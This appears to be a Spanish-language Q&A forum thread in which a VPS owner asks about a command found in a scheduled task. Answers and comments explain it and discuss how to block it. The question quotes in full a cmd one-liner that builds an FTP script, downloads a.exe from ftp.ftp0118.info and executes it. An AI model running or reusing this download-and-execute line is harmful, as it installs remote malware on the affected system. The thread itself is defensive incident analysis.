# ¿Qué hace este batch?

Tags: batch

Lo encontré dentro de mi VPS y en tareas programadas me salio este código quiero saber que significa por favor:

```
/c echo open ftp.ftp0118.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
```

Answer (score 0):

Se conecta a ftp.ftp0118.info, hace login, se pone en modo binary porque se va a bajar un binario, se lo baja, el a.exe, cierra la sesión del ftp y ejecuta el fichero a.exe que se ha bajado.

Los echo lo que hacen es generar un fichero de conexión con ftp que se guarda en s y el

```
ftp -s s
```

ejecuta la bajada.

Tiene muy mala pinta......

Comment: ok amigo eso estaba en mi abministrador de tareas lo que no se es donde se descarga para podar bloquear todos los archivos .exe .bat que puedan ser ejecutados en esa direcion URL o X por favor me podrias decir esa es toda la informacion que tengo no cuento con mas. (me imagino se guarda en algun Temp dentro de la carpeta Windows)

Comment: pues lo mismo buscarlos en el regedit y directamente cambia ese nombre del bat por otro que no sea ejecutable

Comment: es que Bat no existe lo colocaron como (Agregar argumentos (Opcional)) en la parte de nueva Accion ejecutar programa. osea en texto. no en un Bat ejecutable. lo que deseo saber es donde en que parte busco las FTP? o donde se descargen esas APP oase la a.exe para hacer un programa que funcione a modo de blucle en bat cada 1 segundo pase revise si existe algun bat o exe y lo borre o poner que nada dentro de esa carpeta se ejecute.